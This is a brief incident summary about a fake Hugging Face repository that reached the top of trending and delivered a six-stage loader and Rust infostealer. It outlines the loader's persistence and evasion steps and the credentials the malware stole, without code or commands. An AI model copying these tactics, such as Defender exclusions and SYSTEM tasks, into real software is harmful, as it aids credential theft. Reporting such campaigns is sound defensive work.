A fake Hugging Face repo published under “Open-OSS” reached #1 trending and logged ~244,000 downloads and 667 likes in under 18 hours before removal. The repo installed a six-stage loader that fetched commands from a public JSON paste, invoked PowerShell, downloaded a Rust infostealer, added Defender exclusions, scheduled a SYSTEM task, and self-cleaned. The payload exfiltrated Chrome/Firefox passwords, session cookies, encryption keys, Discord tokens, crypto wallet seed phrases, SSH/FTP credentials and screenshots; it evades VMs/sandboxes. AI security firm HiddenLayer flagged the campaign, found related repos and bot-like engagement; Hugging Face removed the repo but has not announced additional trending-repo screening measures.

The repo reached #1 trending with ~244,000 downloads and delivered a multi-stage infostealer that explicitly exfiltrated browser passwords, session cookies, encryption keys, Discord tokens and crypto wallet seed phrases; HiddenLayer identified related malicious repos and bot-driven engagement; the repository was removed but no new screening measures were disclosed — factual security risk to users and stored credentials.